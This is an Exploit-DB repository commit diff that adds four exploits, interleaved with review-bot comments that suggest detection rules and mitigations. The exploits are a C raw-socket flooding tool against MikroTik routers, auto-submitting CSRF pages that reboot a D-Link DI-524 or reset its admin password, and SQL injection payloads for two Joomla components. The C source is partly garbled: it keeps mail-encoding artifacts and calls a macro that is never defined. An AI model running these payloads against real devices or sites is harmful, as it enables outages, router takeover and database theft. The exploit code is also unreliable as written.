DB: 2017-03-15
4 new exploits MikroTik Router - ARP Table OverFlow Denial Of Service Netgear R7000 and R6400 - cgi-bin Command Injection (Metasploit) Netgear R7000 and R6400 - 'cgi-bin' Command Injection (Metasploit) D-Link DI-524 - Cross-Site Request Forgery Joomla! Component Simple Membership 3.3.3 - 'userId' Parameter SQL Injection Joomla! Component Advertisement Board 3.0.4 - 'id' Parameter SQL Injection
parent
8359f0a6a2
commit
c7382d10cd
5 changed files with 474 additions and 1 deletions
|
@ -5390,6 +5390,7 @@ id,file,description,date,author,platform,type,port
|
|||
41547,platforms/windows/dos/41547.py,"Evostream Media Server 1.7.1 (x64) - Denial of Service",2017-03-07,"Peter Baris",windows,dos,0
|
||||
41565,platforms/hardware/dos/41565.py,"Livebox 3 Sagemcom SG30_sip-fr-5.15.8.1 - Denial of Service",2017-03-09,"Quentin Olagne",hardware,dos,0
|
||||
41596,platforms/windows/dos/41596.py,"Cerberus FTP Server 8.0.10.1 - Denial of Service",2017-03-13,"Peter Baris",windows,dos,0
|
||||
41601,platforms/hardware/dos/41601.c,"MikroTik Router - ARP Table OverFlow Denial Of Service",2017-03-05,FarazPajohan,hardware,dos,0
|
||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
||||
|
@ -15316,7 +15317,7 @@ id,file,description,date,author,platform,type,port
|
|||
41511,platforms/windows/remote/41511.py,"FTPShell Client 6.53 - Buffer Overflow",2017-03-04,"Peter Baris",windows,remote,0
|
||||
41545,platforms/windows/remote/41545.py,"Azure Data Expert Ultimate 2.2.16 - Buffer Overflow",2017-03-07,"Peter Baris",windows,remote,0
|
||||
41592,platforms/windows/remote/41592.txt,"MobaXterm Personal Edition 9.4 - Directory Traversal",2017-03-11,hyp3rlinx,windows,remote,0
|
||||
41598,platforms/cgi/remote/41598.rb,"Netgear R7000 and R6400 - cgi-bin Command Injection (Metasploit)",2017-03-13,Metasploit,cgi,remote,80
|
||||
41598,platforms/cgi/remote/41598.rb,"Netgear R7000 and R6400 - 'cgi-bin' Command Injection (Metasploit)",2017-03-13,Metasploit,cgi,remote,80
|
||||
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
||||
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
|
||||
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
|
||||
|
@ -37072,6 +37073,7 @@ id,file,description,date,author,platform,type,port
|
|||
40978,platforms/hardware/webapps/40978.txt,"Dell SonicWALL Secure Mobile Access SMA 8.1 - Cross-Site Scripting / Cross-Site Request Forgery",2016-12-29,LiquidWorm,hardware,webapps,0
|
||||
40979,platforms/php/webapps/40979.php,"Zend Framework / zend-mail < 2.4.11 - Remote Code Execution",2016-12-30,"Dawid Golunski",php,webapps,0
|
||||
40982,platforms/hardware/webapps/40982.html,"Xfinity Gateway (Technicolor DPC3941T) - Cross-Site Request Forgery",2016-08-09,"Ayushman Dutta",hardware,webapps,0
|
||||
40983,platforms/hardware/webapps/40983.html,"D-Link DI-524 - Cross-Site Request Forgery",2016-12-09,"Felipe Soares de Souza",hardware,webapps,0
|
||||
40986,platforms/php/webapps/40986.py,"PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - (AIO) 'PwnScriptum' Remote Code Execution",2017-01-02,"Dawid Golunski",php,webapps,0
|
||||
40989,platforms/jsp/webapps/40989.txt,"Atlassian Confluence < 5.10.6 - Persistent Cross-Site Scripting",2017-01-04,"Jodson Santos",jsp,webapps,0
|
||||
40997,platforms/php/webapps/40997.txt,"Splunk 6.1.1 - 'Referer' Header Cross-Site Scripting",2017-01-07,justpentest,php,webapps,0
|
||||
|
@ -37512,3 +37514,5 @@ id,file,description,date,author,platform,type,port
|
|||
41590,platforms/php/webapps/41590.txt,"Yellow Pages Script 3.2 - 'category_id' Parameter SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
|
||||
41591,platforms/php/webapps/41591.txt,"PHP Forum Script 3.0 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
|
||||
41594,platforms/php/webapps/41594.txt,"Fiyo CMS 2.0.6.1 - Privilege Escalation",2017-03-11,rungga_reksya,php,webapps,0
|
||||
41599,platforms/php/webapps/41599.txt,"Joomla! Component Simple Membership 3.3.3 - 'userId' Parameter SQL Injection",2017-03-14,"Ihsan Sencan",php,webapps,0
|
||||
41600,platforms/php/webapps/41600.txt,"Joomla! Component Advertisement Board 3.0.4 - 'id' Parameter SQL Injection",2017-03-14,"Ihsan Sencan",php,webapps,0
|
||||
|
|
|
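--- a/platforms/hardware/dos/41601.c
+++ b/platforms/hardware/dos/41601.c
@@ -0,0 +1,395 @@
+#Exploit Title: MikroTik Router Denial Of Service | ARP Table OverFlow
+#Exploit Author: Hosein Askari (FarazPajohan)
+#Vendor HomePage: https://mikrotik.com/
+#Affected Series: Hap Lite
+#Version: 6.25
+#Tested on: Parrot Security OS
+#Date: 04-3-2017
+#Category: Network Appliance
+#Vulnerable Part: TCP Stack
+#Author Mail :hosein.askari@aol.com
+#Reference: https://cxsecurity.com/issue/WLB-2017030029
+#CVE:2017-6444
+
+#Description:
+#The MikroTik Router has not protection mechanism for the case of a fast network connection which allows remote attackers to cause a denial of service (CPU consumption) by #sending many #TCP ACK packets. after the attacker stops the exploit , the CPU usage is 100% and the router should be reboot again for working normally.
+
+#################
+#Exploit Command :
+# ~~~#exploit.out -T0 -h <MikroTik_ip> -p [23,23]
+################
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <netdb.h>
+#include <sys/types.h>
+#ifdef F_PASS
+#include <sys/stat.h>
+#endif
+#include <netinet/in_systm.h>
+#include <sys/socket.h>
+#include <string.h>
+#include <time.h>
+#ifndef __USE_BSD
+# define __USE_BSD
+#endif
+#ifndef __FAVOR_BSD
+# define __FAVOR_BSD
+#endif
+#include <netinet/in.h>
+#include <netinet/ip.h>
+#include <netinet/tcp.h>
+#include <netinet/udp.h>
+#include <netinet/ip_icmp.h>
+#include <arpa/inet.h>
+#ifdef LINUX
+# define FIX(x) htons(x)
+#else
+# define FIX(x) (x)
+#endif
+#define TCP_ACK 1
+#define TCP_FIN 2
+#define TCP_SYN 4
+#define TCP_RST 8
+#define UDP_CFF 16
+#define ICMP_ECHO_G 32
+#define TCP_NOF 64
+#define TCP_URG 128
+#define TH_NOF 0x0
+#define TCP_ATTACK() (a_flags & TCP_ACK ||\
+a_flags & TCP_FIN ||\
+a_flags & TCP_SYN ||\
+a_flags & TCP_RST ||\
+a_flags & TCP_NOF ||\
+a_flags & TCP_URG )
+#define UDP_ATTACK() (a_flags & UDP_CFF)
+#define ICMP_ATTACK() (a_flags & ICMP_ECHO_G)
+#define CHOOSE_DST_PORT() dst_sp =3D=3D 0 ?\
+random () :\
+htons(dst_sp + (random() % (dst_ep -dst_sp +1)));
+#define CHOOSE_SRC_PORT() src_sp =3D=3D 0 ?\
+random () :\
+htons(src_sp + (random() % (src_ep -src_sp +1)));
+#define KET() if (sendto(rawsock,\
+&packet,\
+(sizeof packet),\
+0,\
+(struct sockaddr *)&target,\
+sizeof target) < 0) {\
+perror("sendto");\
+exit(-1);\
+}
+#define BANNER_CKSUM 54018
+u_long lookup(const char *host);
+unsigned short in_cksum(unsigned short *addr, int len);
+static void inject_iphdr(struct ip *ip, u_char p, u_char len);
+char *class2ip(const char *class);
+static void send_tcp(u_char th_flags);
+static void send_udp(u_char garbage);
+static void send_icmp(u_char garbage);
+char *get_plain(const char *crypt_file, const char *xor_data_key);
+static void usage(const char *argv0);
+u_long dstaddr;
+u_short dst_sp, dst_ep, src_sp, src_ep;
+char *src_class, *dst_class;
+int a_flags, rawsock;
+struct sockaddr_in target;
+const char *banner =3D "Written By C0NSTANTINE";
+struct pseudo_hdr {
+u_long saddr, daddr;
+u_char mbz, ptcl;
+u_short tcpl;
+};
+struct cksum {
+struct pseudo_hdr pseudo;
+struct tcphdr tcp;
+};
+struct {
+int gv;
+int kv;
+void (*f)(u_char);
+} a_list[] =3D {
+{ TCP_ACK, TH_ACK, send_tcp },
+{ TCP_FIN, TH_FIN, send_tcp },
+{ TCP_SYN, TH_SYN, send_tcp },
+{ TCP_RST, TH_RST, send_tcp },
+{ TCP_NOF, TH_NOF, send_tcp },
+{ TCP_URG, TH_URG, send_tcp },
+{ UDP_CFF, 0, send_udp },
+{ ICMP_ECHO_G, ICMP_ECHO, send_icmp },
+{ 0, 0, (void *)NULL },
+};
+int
+main(int argc, char *argv[])
+{
+int n, i, on =3D 1;
+int b_link;
+#ifdef F_PASS
+struct stat sb;
+#endif
+unsigned int until;
+a_flags =3D dstaddr =3D i =3D 0;
+dst_sp =3D dst_ep =3D src_sp =3D src_ep =3D 0;
+until =3D b_link =3D -1;
+src_class =3D dst_class =3D NULL;
+while ( (n =3D getopt(argc, argv, "T:UINs:h:d:p:q:l:t:")) !=3D -1) {
+char *p;
+switch (n) {
+case 'T':
+switch (atoi(optarg)) {
+case 0: a_flags |=3D TCP_ACK; break;
+case 1: a_flags |=3D TCP_FIN; break;
+case 2: a_flags |=3D TCP_RST; break;
+case 3: a_flags |=3D TCP_SYN; break;
+
+case 4: a_flags |=3D TCP_URG; break;
+
+
+}
+break;
+case 'U':
+a_flags |=3D UDP_CFF;
+break;
+case 'I':
+a_flags |=3D ICMP_ECHO_G;
+break;
+case 'N':
+a_flags |=3D TCP_NOF;
+break;
+case 's':
+src_class =3D optarg;
+break;
+case 'h':
+dstaddr =3D lookup(optarg);
+break;
+case 'd':
+dst_class =3D optarg;
+i =3D 1;
+break;
+case 'p':
+if ( (p =3D (char *) strchr(optarg, ',')) =3D=3D NULL)
+usage(argv[0]);
+dst_sp =3D atoi(optarg);
+dst_ep =3D atoi(p +1);
+break;
+case 'q':
+if ( (p =3D (char *) strchr(optarg, ',')) =3D=3D NULL)
+usage(argv[0]);
+src_sp =3D atoi(optarg);
+src_ep =3D atoi(p +1);
+break;
+case 'l':
+b_link =3D atoi(optarg);
+if (b_link <=3D 0 || b_link > 100)
+usage(argv[0]);
+break;
+case 't':
+until =3D time(0) +atoi(optarg);
+break;
+default:
+usage(argv[0]);
+break;
+}
+}
+if ( (!dstaddr && !i) ||
+(dstaddr && i) ||
+(!TCP_ATTACK() && !UDP_ATTACK() && !ICMP_ATTACK()) ||
+(src_sp !=3D 0 && src_sp > src_ep) ||
+(dst_sp !=3D 0 && dst_sp > dst_ep))
+usage(argv[0]);
+srandom(time(NULL) ^ getpid());
+if ( (rawsock =3D socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
+perror("socket");
+exit(-1);
+}
+if (setsockopt(rawsock, IPPROTO_IP, IP_HDRINCL,
+(char *)&on, sizeof(on)) < 0) {
+perror("setsockopt");
+exit(-1);
+}
+target.sin_family =3D AF_INET;
+for (n =3D 0; ; ) {
+if (b_link !=3D -1 && random() % 100 +1 > b_link) {
+if (random() % 200 +1 > 199)
+usleep(1);
+continue;
+}
+for (i =3D 0; a_list[i].f !=3D NULL; ++i) {
+if (a_list[i].gv & a_flags)
+a_list[i].f(a_list[i].kv);
+}
+if (n++ =3D=3D 100) {
+if (until !=3D -1 && time(0) >=3D until) break;
+n =3D 0;
+}
+}
+exit(0);
+}
+u_long
+lookup(const char *host)
+{
+struct hostent *hp;
+
+if ( (hp =3D gethostbyname(host)) =3D=3D NULL) {
+perror("gethostbyname");
+exit(-1);
+}
+return *(u_long *)hp->h_addr;
+}
+#define RANDOM() (int) random() % 255 +1
+char *
+class2ip(const char *class)
+{
+static char ip[16];
+int i, j;
+
+for (i =3D 0, j =3D 0; class[i] !=3D '{TEXTO}'; ++i)
+if (class[i] =3D=3D '.')
+++j;
+switch (j) {
+case 0:
+sprintf(ip, "%s.%d.%d.%d", class, RANDOM(), RANDOM(), RANDOM());
+break;
+case 1:
+sprintf(ip, "%s.%d.%d", class, RANDOM(), RANDOM());
+break;
+case 2:
+sprintf(ip, "%s.%d", class, RANDOM());
+break;
+default: strncpy(ip, class, 16);
+break;
+}
+return ip;
+}
+unsigned short
+in_cksum(unsigned short *addr, int len)
+{
+int nleft =3D len;
+int sum =3D 0;
+unsigned short *w =3D addr;
+unsigned short answer =3D 0;
+while (nleft > 1) {
+sum +=3D *w++;
+nleft -=3D 2;
+}
+if (nleft =3D=3D 1) {
+*(unsigned char *) (&answer) =3D *(unsigned char *)w;
+sum +=3D answer;
+}
+sum =3D (sum >> 16) + (sum & 0xffff);
+sum +=3D (sum >> 16);
+answer =3D ~sum;
+return answer;
+}
+static void
+inject_iphdr(struct ip *ip, u_char p, u_char len)
+{
+ip->ip_hl =3D 5;
+ip->ip_v =3D 4;
+ip->ip_p =3D p;
+ip->ip_tos =3D 0x08; /* 0x08 */
+ip->ip_id =3D random();
+ip->ip_len =3D len;
+ip->ip_off =3D 0;
+ip->ip_ttl =3D 255;
+ip->ip_dst.s_addr =3D dst_class !=3D NULL ?
+inet_addr(class2ip(dst_class)) :
+dstaddr;
+ip->ip_src.s_addr =3D src_class !=3D NULL ?
+inet_addr(class2ip(src_class)) :
+random();
+target.sin_addr.s_addr =3D ip->ip_dst.s_addr;
+}
+static void
+send_tcp(u_char th_flags)
+{
+struct cksum cksum;
+struct packet {
+struct ip ip;
+struct tcphdr tcp;
+} packet;
+memset(&packet, 0, sizeof packet);
+inject_iphdr(&packet.ip, IPPROTO_TCP, FIX(sizeof packet));
+packet.ip.ip_sum =3D in_cksum((void *)&packet.ip, 20);
+cksum.pseudo.daddr =3D dstaddr;
+cksum.pseudo.mbz =3D 0;
+cksum.pseudo.ptcl =3D IPPROTO_TCP;
+cksum.pseudo.tcpl =3D htons(sizeof(struct tcphdr));
+cksum.pseudo.saddr =3D packet.ip.ip_src.s_addr;
+packet.tcp.th_flags =3D random();
+packet.tcp.th_win =3D random();
+packet.tcp.th_seq =3D random();
+packet.tcp.th_ack =3D random();
+packet.tcp.th_off =3D 5;
+packet.tcp.th_urp =3D 0;
+packet.tcp.th_sport =3D CHOOSE_SRC_PORT();
+packet.tcp.th_dport =3D CHOOSE_DST_PORT();
+cksum.tcp =3D packet.tcp;
+packet.tcp.th_sum =3D in_cksum((void *)&cksum, sizeof(cksum));
+SEND_PACKET();
+}
+static void
+send_udp(u_char garbage)
+{
+struct packet {
+struct ip ip;
+struct udphdr udp;
+} packet;
+memset(&packet, 0, sizeof packet);
+inject_iphdr(&packet.ip, IPPROTO_UDP, FIX(sizeof packet));
+packet.ip.ip_sum =3D in_cksum((void *)&packet.ip, 20);
+packet.udp.uh_sport =3D CHOOSE_SRC_PORT();
+packet.udp.uh_dport =3D CHOOSE_DST_PORT();
+packet.udp.uh_ulen =3D htons(sizeof packet.udp);
+packet.udp.uh_sum =3D 0;
+SEND_PACKET();
+}
+static void
+send_icmp(u_char gargabe)
+{
+struct packet {
+struct ip ip;
+struct icmp icmp;
+} packet;
+memset(&packet, 0, sizeof packet);
+inject_iphdr(&packet.ip, IPPROTO_ICMP, FIX(sizeof packet));
+packet.ip.ip_sum =3D in_cksum((void *)&packet.ip, 20);
+packet.icmp.icmp_type =3D ICMP_ECHO;
+packet.icmp.icmp_code =3D 0;
+packet.icmp.icmp_cksum =3D htons( ~(ICMP_ECHO << 8));
+for(int pp=3D0;pp<=3D1000;pp++)
+{SEND_PACKET();
+pp++;
+}
+}
+static void
+usage(const char *argv0)
+{
+printf("%s \n", banner);
+printf(" -U UDP attack \e[1;37m(\e[0m\e[0;31mno options\e[0m\e[1;37m)\e[0m\=
+n");
+printf(" -I ICMP attack \e[1;37m(\e[0m\e[0;31mno options\e[0m\e[1;37m)\e[0m=
+\n");
+printf(" -N Bogus attack \e[1;37m(\e[0m\e[0;31mno options\e[0m\e[1;37m)\e[0=
+m\n");
+printf(" -T TCP attack \e[1;37m[\e[0m0:ACK, 1:FIN, 2:RST, 3:SYN, 4:URG\e[1;=
+37m]\e[0m\n");
+printf(" -h destination host/ip \e[1;37m(\e[0m\e[0;31mno default\e[0m\e[1;3=
+7m)\e[0m\n");
+printf(" -d destination class \e[1;37m(\e[0m\e[0;31mrandom\e[0m\e[1;37m)\e[=
+0m\n");
+printf(" -s source class/ip \e[1;37m(\e[m\e[0;31mrandom\e[0m\e[1;37m)\e[0m\=
+n");
+printf(" -p destination port range [start,end] \e[1;37m(\e[0m\e[0;31mrandom=
+\e[0m\e[1;37m)\e[0m\n");
+printf(" -q source port range [start,end] \e[1;37m(\e[0m\e[0;31mrandom\e[0m=
+\e[1;37m)\e[0m\n");
+printf(" -l pps limiter \e[1;37m(\e[0m\e[0;31mno limit\e[0m\e[1;37m)\e[0m\n=
+");
+printf(" -t timeout \e[1;37m(\e[0m\e[0;31mno default\e[0m\e[1;37m)\e[0m\n")=
+;
+printf("\e[1musage\e[0m: %s [-T0 -T1 -T2 -T3 -T4 -U -I -h -p -t]\n", argv0)=
+;
+exit(-1);
+}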
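Review bot: The header comments do not match what the code emits: the title speaks of an ARP table overflow and the description of a flood of TCP ACK packets, but `send_tcp` never reads its `th_flags` argument and sets `packet.tcp.th_flags =3D random();`, so `-T0` does not yield ACK-only traffic. Anyone deriving a detection or rate-limit rule from this entry should key on the volume of unsolicited TCP segments with randomised flags and (unless `-s` is given) randomised source addresses, not on the ACK bit. I would record that in the header, e.g. `#Note: TCP flags are randomised per packet regardless of -T; source address is random unless -s is set`, and add the vendor's fixed version or recommended mitigation next to `#Version: 6.25`, which the header leaves out. The file also still carries mail transfer encoding (`=3D`, trailing `=` line breaks), so the entry should be marked as a non-verbatim copy of the original submission.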
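--- a/platforms/hardware/webapps/40983.html
+++ b/platforms/hardware/webapps/40983.html
@@ -0,0 +1,38 @@
+Title: D-Link DI-524 - Cross-Site-Request-Forgery Vulnerability
+Credit: Felipe Soares de Souza
+Date: 09/12/2016
+Vendor: D-Link
+Product: D-Link DI-524 Wireless 150
+Product link: https://dlink.com.br/produto/di-524150
+Version: Firmware 9.01
+
+
+1- Reboot the device
+<html>
+<head>
+<title>CSRF - Reboot the device</title>
+</head>
+<body>
+<iframe width="1" height="1" src="http://192.168.0.1/cgi-bin/dial?rc=@&A=H&M=0&T=2000&rd=status"> </iframe>
+</body>
+</html>
+
+
+2- Change admin account
+
+<html>
+<head>
+<title>CSRF - Change admin account</title>
+</head>
+<body>
+<form method="POST" action="http://192.168.1.1/cgi-bin/pass">
+<input type="hidden" name="rc" value="@atbox">
+<input type="hidden" name="Pa" value="attacker">
+<input type="hidden" name="p1" value="attacker">
+</form>
+
+<script type="text/javascript">
+document.forms[0].submit();
+</script>
+</body>
+</html>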
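Review bot: The advisory names neither a root cause nor a mitigation, and its two proof-of-concept pages disagree on the router address (`192.168.0.1` in the reboot iframe, `192.168.1.1` in the password form), so a reader cannot tell which one is the device default. From the visible requests the firmware appears to accept a state-changing GET on `/cgi-bin/dial` and a POST on `/cgi-bin/pass` with no per-session token among the submitted fields. A short description should say so and give the defensive consequence: the handlers need an anti-CSRF token plus an Origin/Referer check, and until a fixed firmware exists administrators should end the router UI session before browsing elsewhere. Storing the text under an `.html` name also means that opening the archived file in a browser on an affected LAN fires both requests, so a `.txt` extension, as used for 41599 and 41600, would be the safer choice.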
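--- a/platforms/php/webapps/41599.txt
+++ b/platforms/php/webapps/41599.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Joomla! Component Simple Membership v3.3.3 - SQL Injection
+# Google Dork: inurl:index.php?option=com_simplemembership
+# Date: 14.03.2017
+# Vendor Homepage: http://ordasoft.com/
+# Software : https://extensions.joomla.org/extensions/extension/e-commerce/membership-a-subscriptions/simplemembership/
+# Demo: http://ordasvit.com/simplemembership/
+# Version: 3.3.3
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_simplemembership&Itemid=1&task=showUsersProfile&userId=[SQL]
+# +/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,database())),0)--+-
+# # # # #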
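Review bot: Neither this advisory nor 41600.txt says where the flaw sits or how to close it; both give only a request template and a payload. Two added lines would make the entries usable for triage: `# Cause: the 'userId' request parameter reaches the SQL query unsanitised (presumably string-concatenated; confirm against the component source)` and `# Fix: bind the value as a query parameter or cast it to an integer; no fixed version is listed by the author`, with `'id'` in place of `'userId'` for 41600.txt. For detection while the component is unpatched, `extractvalue(` and the `Procedure`/`Analyse` keywords wrapped in versioned comments inside a query string are a reasonable pattern to log or block at a WAF.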
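--- a/platforms/php/webapps/41600.txt
+++ b/platforms/php/webapps/41600.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Joomla! Component Advertisement Board v3.0.4 - SQL Injection
+# Google Dork: inurl:index.php?option=com_advertisementboard
+# Date: 14.03.2017
+# Vendor Homepage: http://ordasoft.com/
+# Software : https://extensions.joomla.org/extensions/extension/ads-a-affiliates/classified-ads/advertisement-board/
+# Demo: http://ordasvit.com/joomla-adboard/
+# Version: 3.0.4
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php/153/show_alone_advertisement/7?task=show_alone_advertisement&id=[SQL]
+# +/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,database())),0)--+-
+# # # # #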